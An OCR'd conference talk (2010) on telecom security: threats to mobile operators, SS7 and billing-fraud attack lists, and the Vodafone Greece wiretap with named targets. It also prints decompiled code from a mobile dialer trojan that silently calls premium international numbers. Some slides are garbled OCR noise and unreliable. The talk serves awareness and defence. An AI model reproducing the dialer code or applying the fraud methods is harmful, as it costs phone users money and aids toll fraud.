HAC vieRl “Telecom Security Issues” An overview of Key Threats & Actors, Case Studies and Possible Scenarios Perrone Raoul Chiesa, UNICRI Club Hack Conference, Pune December 4th, 2010Disclaimer + The information contained within this presentation does not infringe on any intellectual property nor does it contain tools or recipe that could be in breach with known India laws (is there any lawyer in the room btw? ;) + Quoted trademarks belongs to registered owners. + The views expressed are those of the author and do not necessary reflect the views of UNICRI or others United Nations agencies and institutes, nor the view of ENISA and its PSG (Permanent Stakeholders Group).The speaker — Raoul “nobody” Chiesa QOn the underground scene since 1986 Q Senior Advisor on cybercrime at the United Nations (UNICRI) ah CIENISA PSG Member (2010-2012) ; enisa i Founder, @ Mediaservice.net— “* * 2" > aEPSSE Independent Security Advisory Company sa and @ PSS — a Digital Forensics Company “Clus’ ISECOM Q Founder, Board of Directors at: CLUSIT (Italian Information Security Association), ISECOM, OWASP Italian Chapter Q TSTF.net Associated Member =e Q Member: ICANN, OPSI/AIP, EASTAbout UNICRI jat is UNICRI United Nations Interregional Crime & Justice Research Institute A United Nations entity established in 1968 to support countries worldwide in crime prevention and criminal justice UNICRI carries out applied research, training, technical cooperation and documentation / information activities UNICRI disseminates information and maintains contacts with professionals and experts worldwide Counter Human Trafficking and Emerging Crimes Unit: cyber crimes, counterfeiting, environmental crimes, trafficking in stolen works of art...About ENISA ENISA’ What + European Network & Information Security Agency + ENISA is the EU’s response to security issues of the European Union + "Securing Europe's Information Society” is our motto (27 Member States) *In order to accomplish our mission, we work with EU Institutions and Member States *ENISA came into being following the adoption of Regulation (EC) No 460/2004 of the European Parliament and of the Council on 10 March 2004. Operations started on September 2005, after moving from Brussels to Crete, and with the arrival of staff that were recruited through EU25-wide competitions with candidates coming from alll over Europe. *ENISA is helping the European Commission, the Member States and the business community to address, respond and especially to prevent Network and Information Security problems. *The Agency also assists the European Commission in the technical preparatory work for updating and developing Community legislation in the field of Network and Information Security. x* + I'ma Member of ENISA’s PSG ~ Permanent Stakeholders Group. Pi * x enisa European Network * ‘endinformation 4 ” Security Agencye@ About Tstpnet CESEE We are a think-tank established more than 10 years ago. We know all of us (team members) since the 80’s. Some names: Emmanuel Gadaix, Philippe Langlois, Stavroula “Venix” Ventouri, Fyodor Yarochkin (xprobe2), All of us we have pentested/audited more than 120 phone operators all over the world. Huge experience, no sales pitches: we know our stuff. Built the very first open-source SS7 Scanner (SCTP). Making R&D, everyday, every hour, every single minute ;)More on TSTF.net Who's who Q 35 years combined GSM telecommunications experience; Q 50 years combined information security experience; Q A unique view on telco security — nobody else does it; O Active research (papers, tools, forums); Q Experience in Europe, Asia, USA; QO Self-funded, no business cunts running it, no VCs. Networked structure Q Structure similar to the Global Business Network (http://www.gbn.org/); Q No central office, global coverage; Q Leverage on each individual's skills and services; Q Leverage on network effect.Our experiences (excerpt, 1999-2004) (obviously, we’got much MORE © 1999: GSM Internet Data Access Penetration Tests 2000: GPRS Internet Data Recess Penetration Tests 2000/2008: ..5,/L.1.6. Security Audits on a +15 MLN subscribers 2000: SMS Spoofing PoC & Security Consulting 2001: Dealers’ shops Abuse Security Testing: 2001: SMSC Ethical Hacking Test 2001: SAP environments Security Audit 2001-2008: VAS Security Audits and Pen-testings 2001-2008: xi0S and Firewall tuning and configurations review 2002/2008: Wireless Penetration Tests on HQ and main branches (+10 MLN subscribers: +15 MLN subscribers) 2002: Wireless Security Policy (private and public hot-pots) 2003: Portals Web Applications Security Testing (various tests onthe applications 2003: Bling gateway process Full Security Audit & Pentests 2003: MMS environment Ethical Hacking tests 2008: Black Berry FE/BE Penetration Testing 2004: X.25 Security Audit Full Process (9 months) 2004: New mobile threathe R&D process (3 months) 2008: DoS incident handling policy (referred to the private WAN) loped for the subscribers) KERR RRR RRR RR KR RK STopics for this session Introduction MSC hacking / the Vodafone Greece Affair Data Network Elements hacking (i.e.. GPRS) Billing, Mediation, LIS/LIG hacking $S7 hacking Web Applications’ suppliers standard issuesTHE PROBLEM O Telecommunications vendors (Nokia, Ericsson, Alcatel, etc.) are selling insecure software and systems to telcos. Q Telecommunications operators have a very poor understanding of security issues. Q Based on 10 years penetration testing experience, telco operators are the most vulnerable of all industry groups. Q Sophisticated hackers have an increased interest in telco security and phone hacking.THE VENDORS Q Some vendors have decided to take an active stance in security (e.g. Nokia), however such initiatives are isolated and do not address most telcos security problems. Most vendors sell antiquated software full of bugs, running on old and unpatched version of operating systems and daemons. OQ Operators cannot fix the identified security weaknesses because it would void their warranty. The result of this ‘head in the sand’ approach is an increase in the threat: national and international critical infrastructures are at risk.THE OPERATORS Q. Operators rely on vendors for secure solutions. Q Operators are primarily focused on network operations, software upgrades, network performance and other time-consuming routine tasks. O Operators lack in-house expertise on telco security. Qi Operators are usually divided between the IT and Engineering, departments, creating two separate security domains. Most telcos networks are open to attackers (I don’t say “hackers”!).Q GSM operators typically split their network between IT (the incompetent team running the mail, the domains, the printers and the proxy/firewall) and Engineering (the telco side). © Usually there is distrust between the two entities, poor communications and certainly no common policy towards security. IT of course believe they are important, but in fact they just have a support role, If all IT systems stop working, you can still make phone calls. (Emmanuel Gadaix, TSTF - Black Hat Asia Security Conference, 2001)THE OPERATORS Based on a +10 years study encompassing 24 network operators in four different continents (EU, Asia, USA, Australia): & x Fd x & x & 100% could be hacked from the Internet via Web Apps 90% could be hacked through PSTN, X.25, ISDN or Wi-Fi 72% had a security incident in the last 2 years 23% had appropriate perimeter security control 0% had all their mission-critical hosts (really) secured 0% had comprehensive database security in place 0% had integrity measures protecting billing data, nor encryptionTHE ENEMY Q Telco fraud is still an attractive target: Bypassing toll, getting services without fees, setting up premium numbers, etc; Y Privacy invasions: interception of call-related data (e.g. CDRs, SMS contents, signalling data, billing data; etc) Y Eavesdropping and cloning: illegal interception and cloning of mobile phones. Recently one underground group announced it was reverse engineering Nokia and Symbian software; A group of sophisticated hackers is working on abusing the $S7 protocol; EX] another group of international security researchers is working on VoIP attacks in telcos environments (Mobile, PSTN/ISDN, SS7, I.N.)THE COMPETITION LXI Traditional security shops: no knowledge of telcos, poor understanding of telcos procedures. X] Traditional telcos consultancies: very poor knowledge of security issues. LX] “Big 4” audit firms: focused on p (they outsource their jobs to us). jes, no real expertise LX] In-house resources: very dangerous. Internal fraud is overlooked; interdepartmental ego problems; good security and bad security looks the same.DOING NOTHING... Q ... with yours telco infrastructures today is like doing nothing with the RAS accesses in the 80’s... Q ...with the X.25 networks in the 90’s... Q. ....and with your Internet hosts during the Y2K: it’s an open invitation for disaster.> “BUT..WHY SHOULD WE C@4E ‘BOUT TH3S3 L33T ATTACK3RS ?!2” Pe Oy — Rating wG Mediation s& $0 Service Network <<=> Eeecer > ....BECAUSE YOU LOOSE YOUR MONEY.AND, because.... * Hackers are speaking about, investigating, discussing, hacking telco-related stuff (everything!) since a lot of time now (began in the 70’s, became a trend in the 80’s and 90’s, a standard from 2000 up to today). « .Wanna see some examples??2008 Y DEFCON 16 - Taking Back your Cellphone Alexander Lash Y BH DC/BH Europe — Intercepting Mobile Phone/GSM Traffic David Hulton, Steve— Y BH Europe - Mobile Phone Spying Tools Jarno Niemela— Y BH USA - Mobile Phone Messaging Anti-Forensics Zane Lackey, Luis Miras Y Ekoparty - Smartphones (in)security Nicolas Economou, Alfredo Ortega Y BH Japan - Exploiting Symbian OS in mobile devices Collin Mulliner— v GTS-12 - iPhone and iPod Touch Forensics Ivo Peixinho v 25C3- Hacking the iPhone - MuscleNerd, pytey, planetbeing Y 25C3 Locating Mobile Phones using SS7 — Tobias Enge!- Anatomy of smartphone hardware Harald Welte Y 25C3 Running your own GSM network — H. Welte, Dieter Spaar ¥ 25C3 Attacking NFC mobile phones — Collin Mulliner486 BS 46 & 44456 4 2009/1 ShmooCon Building an ai phannel Bluetooth Monitor Michael Ossmann and Dominic S ShmocCon Pulling a ‘ohh roohiee Defeating Android Charlie Miller BH USA- Attacking SMS - Zane Lackey, Luis Miras — BH USA Premiere at YSTS 3.0 (BR) BH USA Fuzzing the Phone in your Phone - Charlie Miller, Collin Mulliner BH USA Is Your Phone Pwned? - Kevin Mahaffey, Anthony Lineberry & John Hering— BH USA Post Exploitation Bliss — BH USA Loading Meterpreter on a Factory iPhone - Vincenzo lozzo & Charlie Miller BH USA Exploratory Android Surgery - Jesse Burns DEFCON 17- jailbreaking and the Law of Reversing - Fred Von Lohmann, Jennifer Granicl DEFCON 17 Hacking WITH the iPod Touch - Thomas Wilhelm DEFCON 17 Attacking SMS. It's No Longer Your BFF - Brandon Dixon DEFCON 17 Bluetooth, Smells Like Chicken - Dominic Spill, Michael Ossmann, Mark StewatdKAN KKK KS KK 2009/2 BH Europe- Fun and Games with Mac OS X and iPhone Payloads - Charlie Miller and Vincenzo lozzo- BH Europe Hijacking Mobile Data Connections - Roberto Gassira and Roberto iccirillo— BH Europe Passports Reloaded Goes Mobile - Jeroen van Beek CanSecWest- The Smart-Phones Nightmare Sergio 'shadown’ Alvarez CanSecWest - A Look at a Modern Mobile Security Model: Google's Android Jon Oberheide— CanSeclWest- Multiplatform iPhone/Android Shelleode, and other smart phone insecurities Alfredo Ortega and Nico Economou EuSecWest - Pwning your grandmother's iPhone Charlie Miller- HITB Malaysia - Bugs and Kisses: Spying on Blackberry Users for FunSheran Gunasekera- YSTS 3.0/ HITB Malaysia - Hacking from the Restroom Bruno Gongalves de Oliveira PacSec - The Android Security Story: Challenges and Solutions for Secure Open ‘Systems Rich Cannings & Alex Stamos DeepSec - Security on the GSM Air Interface David Burgess, Harald Welte DeepSec - Cracking GSM Encryption Karsten Nohi~ DeepSec - Hijacking Mobile Data Connections 2.0: Automated and Improved Roberto Piccirillo, Roberto Gassira— DeepSec - A practical DOS attack to the GSM network Dieter SpaarOverview on attacks (then we'll jump straight to a few, single topics)A MORE COMPLICATED WORLD... %,, /EMc “ty, ase ook ptyal Networks Say, SES ay f Public safety? 74, ae om NPS Bison PO oe oo TETS oe ew A iS ¢. DECT hn “ey, vw <& Wa oe eh GSM win VSAT aA ow n cTm co £ out °ss Voice over Testing Methods Internet Protocol.. WITH DIFFERENT STANDARDS, BUT A UNIQUE MARKET Mobile Operators ous > — ee | 5 —: 3...BUT THE THREAT IS GLOBALPHREAKING TELCOS Y Phreaking is a slang term for the action of making a telephone system do something that it normally should not allow. QO) Why would anyone do this?? “ | do it for one reason and one reason only. I'm learning about a system. The phone company is a System. A computer is a System, do you understand? If I do what Ido, it is only to explore a system. Computers, systems, that's my bag. The phone company is nothing but a computer. ” Captain Crunch From Secrets of the Little Blue Box Esquire Magazine, October 1971(pause) LOL!!A QUICK OVERVIEW: ATTACKS ON MOBILE OPERATORS/1 The “Phreaking” concept can be explained as “Hacking the phone line”; Since the 60's, phreaking exploded all around the world; From those times, intrusion stories in telcos environments became very common; In the following slides we will give you a resume of the various type of attacks that can be applied in Mobile Networks; Many of these attacks have been practical tested and demonstrated by our Tiger Team during the years.A QUICK OVERVIEW: ATTACKS ON MOBILE OPERATORS/2 Q Attacks have been classified into the following areas: KARR ARAK ARK RAN Attacks (Radio Access Network) TN Attacks (Transmission Network) sf : NSS Attacks (Network Switched Network) IN Attacks (Intelligent Network) SMS/Messaging Attacks (SMS, VMS) i MMS Attacks NMS/OSS Attacks (Network Management System/Operations) ME & Billing GW Attacks (Mediation and Billing) LIS/LIG Attacks (Legal Interception System/Gateway) $S7 Attacks (Signalling System # 7) ..not forgetting the “old school” PSTN, ISDN and X.25 attacksTHE NETWORK ELEMENTS Q Radio Access Network (BSS/RAN) Q Mobile Switching Center (MSC/NSS) Q Home Location Register (HLR/VLR) O Intelligent Network (IN) O Messaging (SMSC, MMSC, USSD, VMS) Packet data (GPRS, EDGE, 3G/UMTS) Q Network Management (NMS, OMC, OSS) Q Mediation, Billing, Customer Care, LIGMSC * Mobile Switching Center * Is probably the most important asset in a Mobile Operator * We will speak about the Vodafone Greece case shortly...GGSN Ollie Whitehouse around 2002/2003 successfully exploited Nokia GPRS-related elements (GGSN, SGSN). Result? DoS on all of your Data connections (Operator Level) if you run GPRS on Nokia’s HW (at that time, obviously). Is it only Nokia? NO! ALL of them may be vulnerable.Web Applications Security * I’ve moved this in the last section, along with “evidences”. * Basically, problem here is that the “standard players” (big 4, Accenture, etc etc) are often releasing insecure Web Applications. * Exposed to: — XSS/CSRF /etc — SQL Injection(s) — ...whatever! ©The “Vodafone Greece Affair”In one shot - Greece + Basically, what the hell happened ? ¥ +One hundreds “VIP” mobile subscribers have been eavesdropped: Government members, Defense officials mainly, including the Greek Prime Minister, Foreign, Defence, Public Order officials, etc. ¥ Calls from and to +100 SIMs were diverted to 14 “pay-as-you-go” mobile phones. ¥ Four BTS were “interested” by the area where these receiving SIMs where located. ¥ “Incidentally”, Athens US Embassy is right in the middle of them © Y This has been done via a high-level hack to the Ericsson AXE GSM MSC; building a rootkit “parked” in the RAM area, since obviously the MSC was on “production” (!!!). v “The Hack” was discovered on March 7th, 2005, by Ericsson technical staff. One year later at least. Maybe longer....nobody knows @ ¥ On March Sth, a Vodafone “top technician” (KT) commited suicide. (Kostas Tsalikidis, 39 y.o., Head of Network Design). ¥ EYP (Hellas National Intelligence Agency) began investigating at once. x Right now, no-one has no idea about who did it and why.Profiling: Actors involved Some elite hacker. — Retired Ericsson technical guy(s) ? Some seriously-intentioned IA (CIA?). Some historical and geo-political situation (Carpe Diem). Local politicians and National Secret Service The Olympic Games ? The “best hack of 2005” prize. For sure.Targeted people (Vodafone Hellas/1) * GOVERNMENT TARGETS: Karamanlis, Kostas Prime Minister of Greece (two phones of 20) Elef. 3Feb Molyviatis, Petros then Foreign Minister, a private phone Elef. 3Feb Spiliotopoulos, Spilios then Minister of Defense Elef. 3Feb Voulgarakis, Giorgos then Minister of Public Order Elef. 3Feb Papaligouras, Anastasios Minister of Justice Elef. 3Feb Valinakis, Giannis Alternate Foreign Minister Elef. 3Feb Dimas, Stavros EU Commissioner Elef. 3Feb Bakoyianni, Dora then Mayor of Athens Elef. 3Feb Vallindas, Giorgos Ambassador, Foreign Ministry Mideast Division Director Elef. 3Feb Choreftaki, Glykeria Foreign Ministry employee Elef. 3Feb Papantoniou, Giannis PASOK MP, ex Minister of Defense Elef Apostolidis, Pavlos then Head of Greek Intelligence Service (EYP), his car phone Nea Karamanli, Natasha wife of Prime Minister Nea eight unidentified foreign ministry officials Nea unnamed intelligence officials EYP operations officers Nea Korandis, Giannis current EYP director, then Ambassador to Turkey, his private car phone Nea 3-16 Molyviati, Lora daughter of former Foreign Minister Nea 3-16Targeted people (Vodafone Hellas/2) * POLICE/SECURITY TARGETS: Maravelis, Dimitris Police officer in Olympic Security Elef. 3Feb Maris, Giorgos lawyer, legal advisor to Public Order Ministry Elef. 3Feb Angelakis, Dimitris Police in Olympic Security or EYP unionist Elef. 3Feb Sontis, Theodore U.S. Embassy Greek-American, gave to security detail Elef Kyriakakis, Evstratios Former Director, Criminological Service, Greek Police Ta Nea Galiatsos, G. Director of Exercises, Athens Olympic Security Ta Nea Mitropoulos, G. Chief of Staff, Ministry of Public Order Ta Nea Konstantinidis, V Olympic Games Security Director Ta Nea Nasiakos, Fotis Former Chief, Greek Police (phone given to another) Ta Nea Dimoschakis, An. Chief of Staff, Greek Police Ta Nea Syrros, St. Former director of Counterterrorism division, Greek Police Ta Nea Galikas, D. Director of Counterterrorism Division, Greek Police Ta Nea Angelakos, Giorgos Chief of Greek Police Ta Nea seven senior military Senior officers in general staff Ta Nea General Staff Communications Dir Communications Director, chief of General Staff Defense Ministry staffer Defense Ministry staff company Eleft 2/5Targeted people (Vodafone Hellas/3) * FOREIGNER CITIZIENS TARGETS: Meim, Mohamad Pakistani Elef Moktar, Ramzi Sudanese Elef Maloum, Udin Elef Jamal, Abdullah Lebanon radio reporter or Syrian journalist, now fast food operator Elef Sadik, Hussein Moh. Pakistani store owner Elef Tarek, Ibrahim Ahmet Iraqi Elef Kadir, Aris Kurd Elef Thair, Hermiz Iraqi Elef Ayoubi, Chadi Lebanese al Jazeera reporter, Gr resident Elef Basari, Mohamed Iraqi immigrant Igoumenitsa, 3 years, furniture factory worker Nea 3-16 Unnamed Syrian Unnamed Syrian, 3 years Nea 3-16 Unnamed Iraqi Unnamed Iraqi, 2 years Nea 3-16Targeted people (Vodafone Hellas/4) + UNEXPLAINED TARGETS: Fergadis, Theodoros businessman Elef. 3Feb Kakotaritis, Giorgos blanket factory? Elef. 3Feb Linardos, Nikolaos Pegasus financial co, underwear firm Nea 3-16 Cretan businessman shipper of remote control airplanes, including Souda Bay Vima 3/25 Cretan refrigeration tech Refrigeration tech from Ag. Nikolaos Crete Vima 3/25 Koika, Katerina journalist Elef. 3Feb Psychogios, Giorgos criminal lawyer, Thebes mayor candidate Elef. 3Feb Makris, Kostas Elef. 3Feb Barbarousi, Dimitra Elef. 3Feb Notas, Anastasios Elef Pavlidis, Pavlos Elef Pnevmatikakis, Angelos Elef unknown card phone 6942 5447.. Activated 2/28/05 Vima 2/25Conclusions A “suicided” dead man here too... — Telecom Italia scandal (2005) — KGB/CCC (1989) A very light negative image of Vodafone Hellas: media didn’t hit that much the subject on the news coverage. Obscure CIA links ? Rootkit Ericsson AXE MSC.5 years later.... (2010) * What’s going on?!? * It happened that cybercrime organized gangs began realizing, since 2005, that it’s all about money... * And, that the end-user it’s an easier hack rather than a Corporate Telco (depends on the Telco, tough! ;)Upcoming issues: targetting the end-user with mobile dialers Join Date: Jan 2010 smudgelab @ [oP] Posts: 38 Member & Phone dialled out internaionally without permission! Really wierd one this. Last night, I was woken by a repetitive voice telling me that “International dialling is not currently permitted from this device". As this was at aprox’ 02.40 on Suday AM, it fair shook me out of a deep sleep! On checking the phone I found the following call history: +88213213214 © 02:44 488213213214 @ 02:36 +1(767)503-3611 @ 02 36 +1(767)503-3611 @ 02:36 4+1(767)503-3611 @ 02:36 +8823460777 @ 02:35 T have absolutely no idea who or what these numbers are for (Google suggests +882 may be something to do with satellite phones(!?) & +1767 appears to be a Dominican country code(!!7?) but it was very unnerving to see my phone has been trying to ring these without any input from me. I'll be onto Virgin mobile later to see if they can help but thought I'd try the collective wisdom of you guys first. Virus / dialler maybe? Do these even exist for win mo phones? Any help wil be very much appreciated. Thank you.Uh? How this happened??“Playing games”, do ya?? ©Let’s pick up one... |.and its “hidden” code nt mums = (int) key GetValue("Status"); i ((numS == 1) && (Assembly GetExecutngAssemby().GetName(). CodeBase « Phone phone = new Phone): ‘phone Talk("#8823460777°) ‘Thread. Sleep(0xc350); ‘phone Taik("+17675033611"); ‘Thread Sleep(0xc350), phone.Tatki"+88213213214"); ‘Thread Sieep(0xc350), ‘phone Taik("+25240221601"); ‘Thread Sleep(0xc350) ‘phone Taik("+2392283261"); ‘Thread Sleep(0xc350); phone. Tatk("+881842011123"); Jong numé = DateTime Now AdaMontns(1).ToFueTime(); Jong num? = OL; FileTimeToLocalFleTme(ret num6, ref num?); ‘SystemTime te6 = new SystemTime() FieTimeToSystemTime(ret num7, times); (CeRunAppAtTime(@"Windowsismart32.exe", tes):The numbers * +882346077 Antarctica * +17675033611 Dominican republic ¢ +88213213214 EMSAT satellite prefix * +25240221601 Somalia * +2392283261 Sdo Tomé and Principe * +881842011123 Globalstar satellite prefix| about us Cc ae MEN enemecal al sees Bee© © © wow ners preman-tseom comin Spal oe Nogeleeenom beeen 8 Br | @ 1 Ove Payouts #00 # aEH Ee eee ||| TET eee€ 9). O mmnpremumtetesconirtensinsnunoes a wre De premium-rates “ & en Pass en neste onset eng Internationa Payeut aaa | ae rrr _ ee how ei ton coe ame cote oon rae e a a mineSo...we’re talking about Billing, right? That, to me, goes straight along with Mediation ©MEDIATION AND BILLING ection Systm Provstoning a Charging Gateway Formatted con on Q Mediation is the process that converts and transports raw CDR data Q It can also be used to translate provisioning commands to the NE O It is a critical part of the provisioning and billing cycles QO Most convenient place to commit fraudTHE BILLING PROCESSATTACKS ON MEDIATION / BILLING Q Raw database edit. Conveniently deletes selected records containing billing data. Q Modification of the charging tables in the billing system Q Patching of the rater application to eliminate certain CDR e.g. belonging to a given MSISDN Q Backdoors in mediation gateways to remove CDR data O Confidential information on subscribers activities (numbers called, received, SMS, data, etc.) Q Modification of CDR processing rules Q Modification of “test numbers” whitelist Q Live patching of CDR data while in mediation queue Q Patching of mediation application (e.g. loading scripts) QO GPRS packet aggregation rules modificationL.LLG./L.LS. ATTACKS Q Legal Interception Gateway is used by police and intelligence agencies. Q Connected to MSC though special interface. Very user-friendly. Q Based on standard UNIX and TCP/IP so potentially open to common attacks Q Compromise of a LIG would allow real-time interception and call eavesdropping. Q Could compromise the agencies’ own facilities. Q RAOUL, don’t forget to tell ‘em about the “911 Pentest”.... ;) useSS7: the next nightmare A Signalling & Billing (inter-operators) protocol build in the 70’s and developed in the 80's. Why? LOL serene ‘cause Captain Crunch invented blue- boxing, that was running in-band. So $S7 went “out-of-band”. Simple (KISS)!—=—<—<—= SS7 SIGNALLING coe nap esirs2) = U Mobile networks primarily use signalling System no. 7 (SS7) for communication between networks for such activities as authentication, location update, and supplementary services and call control. The messages unique to mobile communications are MAP messages. C1 The security of the global SS7 network as a transport system for signalling messages e.g. authentication and supplementary services such as call forwarding is open to major compromise. Q The problem with the current $57 system is that messages can be altered, injected or deleted into the global $S7 networks in an uncontrolled manner.EXAMPLES OF SS7 ATTACKS Q Theft of service, interception of calling cards numbers, privacy concerns Q. Introduce harmful packets into the national and global SS7 networks O Get control of call processing, get control of accounting reports Q Obtain credit card numbers, non-listed numbers, etc. O Messages can be read, altered, injected or deleted O Denial of service, security triplet replay to compromise authentication O Annoyance callls, free calls, disruption of emergency services Q Capture of gateways, rerouting of call traffic O Disruption of service to large parts of the network O Call processing exposed through Signaling Control Protocol Announcement service exposed to IP through RTP Q Disclosure of bearer channel trafficSS7 ENTRY POINTSO With a limited number of carriers and limited points of interconnection, the operators could assume with fair certainty that all of the elements passing data were trusted sources. Q Unlike IP protocols, security features like authentication and encryption were not built into the $$7 protocol. Rather, the focus has been placed on creating secure physical environments for the network equipment rather than secure protocols. Q STPs, the routers of the SS7 network, perform gateway screening to prohibit inbound and outbound messages from unauthorized nodes. The addresses of individual nodes within a network are isolated. Q Global title translation (GTT) enables a network to receive messages from other networks without disclosing the unique addresses, called point codes, of its own nodes.SS7: ATTACK TAXONOMY INTERCEPTION INTERRUPTION wenrieATON | FraREATON —]y Psa noacaion "SUP Mog Modieton Esyeseropping (Sonar) [Denil of erie (Sotware) spooting (swore) Exvesdropping (Stare) "SSP impersonation SUP Msg. Generation Esecaropping (Seiwa) Pena of Sec (Star) > SCP eg eration = NP Unk honapemen ack Esvesdroppng (Scare) St impersonation SeAP eg Wotexton esessonping Speed dialing DB Arak suntn Contrnee Gale Number Tranlaon D8 ack > TCA tag Atraon > TP Link Management Aack *SCCRTCAP Mag. Generation |} TeAB DB Query Fabrication Tot Fra (sonar) Esessronping don tac Rowing BB Ack SCP Mg, Rerouting Aack (sofware) ral re) ASOME REAL-LIFE EVIDENCESWI-FI: HW TOOLS FOR PROACTIVE SECURITYCDR FILES FROM MEDIATION AREA XXXB5577104F3UWNACC/>UAN@MANACKB2>NAN @ XXX21995574F3#YuACAC4F ACAOS*AACESA>*CACAFEVT>*CAOS4B*@4A* @<<<>4F4A%X4A" @*A4@ 4A*@AB*A<0%>*A*B<34>%U4AS @4A*A4A%@ SBPROCESSED SMS: “FROM” & “TO”SMS PROCESSING QUESNIFFING ON “IN PROGRESS” SMSsOBTAINING CUSTOMERS INFORMATION 2 Ly aa 3 G E [eo mr cr toy a Telecomunicazioni dal Username t paces Password: eee Genes) Eeeworan)ATTENZIONE La login o la passrord inserite non sono corrette, Cortollare che il maiuscolo non sie alivato Per accedere nuovamente alla pagina iniziale premere il pulsante OK %0 Home agente: Federico codice Agente: oo Dba ee saonds: = 4 > ats © row D soe a | Uitimo Collaganento: 26/7/02 alle ore 14:27:10 a iii SSaiiim HeTelecorkunicazioni dal ‘This can be seripted | Detagio: A sr. Codce Agente: Cosice Clone: liso4o0 Codice Contate: RISTO Teletone D0 Numero di Linge: 5 CliperContatte 3 sone fare ea para fea fom fe (non forme ca wmeghe fore [athe eae ”Contacts * Raoul Chiesa Senior Advisor, Strategic Alliances & Cybercrime Issues UNICRI — United Nations Interregional Crime & Justice Research Institute @ Mediaservice.net, Founder Email: chiesa@UNICRI.it (UN) raoul@mediaservice.net (business)QUESTIONS? THANKS FOR YOUR ATTENTION GUYS!!!!